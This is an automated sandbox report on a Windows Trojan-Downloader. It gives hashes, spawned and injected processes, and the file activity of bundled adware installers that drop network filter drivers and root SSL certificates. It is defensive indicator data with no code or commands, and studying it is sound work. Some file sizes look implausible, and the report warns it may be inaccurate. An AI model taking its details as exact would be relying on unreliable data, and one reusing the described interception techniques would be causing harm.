Trojan-Downloader.NSIS.Adload.bs (Kaspersky), Installer.Win32.InnoSetup.2.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Installer, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5108469d6aedae76348b6e88ba3e8a65
SHA1: 2004a3616720384de308cec8c31ca91ec824821b
SHA256: 3c57d2e68ac69215ca6c80560b70b90cfdada8461094451d1584aa810e394833
SSDeep: 1536:mQpQ5EP0ijnRTXJOG5ZRr2CEU5170WC3/88fojRhAaS2Wib9xeNhS:mQIURTXJOG5ZRr2Cn550W88R1Bb9gNk
Size: 71088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180
The Trojan injects its code into the following process(es):
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316
ActSys.exe:2648
%original file name%.exe:1396
CashReminder.exe:1232
WNet.exe:2284
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (0 bytes)
%Program Files%\ActSys\asfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)
The process XTab_Setup2121.exe:3372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
The Trojan deletes the following file(s):
%Program Files%\GOSafer\gosaferdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (0 bytes)
The process QQBrowser.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (0 bytes)
The process QQBrowser.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq7.tmp (0 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (0 bytes)
The process HPNotify.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XTab\conf (1630 bytes)
The process ActSys.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (0 bytes)
%Program Files%\WNet\ssfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (0 bytes)
The process cmdshell.exe:3548 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\rebirth[1].htm (0 bytes)
The process amisetup5755__9664.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)
The process %original file name%.exe:1396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
